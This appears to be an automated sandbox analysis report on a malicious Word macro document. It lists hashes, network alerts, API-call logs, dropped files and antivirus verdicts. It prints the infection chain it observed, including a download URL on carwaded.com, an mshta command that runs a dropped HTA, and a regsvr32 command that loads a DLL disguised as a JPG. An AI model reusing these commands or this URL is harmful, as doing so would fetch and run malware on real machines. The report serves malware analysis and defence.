popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

dictate 010.21.doc

VBA_macro Malicious Library UPX GIF Format Word 2007 file format(docx) PE64 PE File DLL OS Processor Check
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 21, 2021, 6:25 p.m. Oct. 21, 2021, 6:30 p.m.
Size 34.2KB
Type Microsoft Word 2007+
MD5 3128a1aa061355d275cd323336148c4a
SHA256 1cdae1a82f4320ba429c8aa6cb7b9236bae8edcf5fe67b79242aa0dcce157060
CRC32 91A13DEC
ssdeep 768:b0klHQ1+hFaa02VWnZdw9822zG2CotDGUTm:4k5xfgcWwkQotah
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • docx - Word 2007 file format detection

Name Response Post-Analysis Lookup
carwaded.com
A 185.53.46.50
185.53.46.50
IP Address Status Action
164.124.101.2 Active Moloch
185.53.46.50 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.53.46.50:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.53.46.50:80 -> 192.168.56.103:49172 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 185.53.46.50:80 -> 192.168.56.103:49172 2014520 ET INFO EXE - Served Attached HTTP Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://carwaded.com/cbfsd/24347/41EodPr8rdAPbi/rFjYEqQBN9BzlXOJ/co2DYqCcQatc3tAfiFpqO/kjCz20ymbCMJOn6FyZTDtGZBcaJ2NEXURT1Fv4LjjUwj/65781/h0ZG8aSvwTaxxnHLMlOEl0l9P5EKiO/nTsA9y9hdvZVFYOv4FXv/iRH894BQn5REjnyNNViZab9ri8KRve9vDsY32giK/Iix2kVOrJlJj1M9CMWpP73kUBQhklw6/zes2?ref=AuVcQ
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa06000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9eb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9f7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9db000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9d6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa1b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9b7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9fb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa22000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa0b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa06000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9eb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9f7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9db000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9d6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa1b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9b7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9fb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a46e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d66000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d66000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d66000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d66000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03a99000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d66000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d66000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03a99000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02830000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02832000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02832000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02832000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2612
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03ae0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2612
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02832000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02833000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02833000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 10227531776
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Temp\~$ctate 010.21.doc
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\redKingIn.hta.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000494
filepath: C:\Users\test22\AppData\Local\Temp\~$ctate 010.21.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$ctate 010.21.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000628
filepath: c:\Users\Public\~$dKingIn.hta
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\c:\users\public\~$dKingIn.hta
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\redKingIn.hta.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
cmdline "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\redKingIn.hta"
cmdline "C:\Windows\System32\regsvr32.exe" c:\users\public\carolineLineLine.jpg
cmdline regsvr32 c:\users\public\carolineLineLine.jpg
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Thu, 21 Oct 2021 09:28:56 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 X-Powered-By: PHP/7.2.34 Content-Description: File Transfer Content-Disposition: attachment; filename="zes1" Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 10616965 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†ڏnað" ˆžì>€P¢Pó¢`0.”Ä6´ÐÀnœØ-@¢¼¿8P¿ `.textn‡ˆ `.rdataЧ ¨
received: 1024
socket: 988
1 1024 0

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†ڏnað" ˆžì>€P¢Pó¢`0.”Ä6´ÐÀnœØ-@¢¼¿8P¿ `.textn‡ˆ `.rdataЧ ¨
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x00000378
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Lionic Trojan.MSOffice.SAgent.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.47223368
Cyren PP97M/Agent.ADW.gen!Eldorado
ESET-NOD32 a variant of Generik.NNZYVVH
TrendMicro-HouseCall Possible_OLEGTAD
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.47223368
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
TrendMicro Possible_OLEGTAD
McAfee-GW-Edition BehavesLike.Downloader.nc
FireEye Trojan.GenericKD.47223368
Ikarus Win32.Outbreak
ZoneAlarm HEUR:Trojan.MSOffice.SAgent.gen
McAfee RDN/Generic.dx
MAX malware (ai score=85)
SentinelOne Static AI - Malicious OPENXML
Fortinet VBA/Agent.F251!tr.dldr
parent_process winword.exe martian_process "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\redKingIn.hta"
parent_process winword.exe martian_process c:\Users\Public\redKingIn.hta
file C:\Windows\SysWOW64\mshta.exe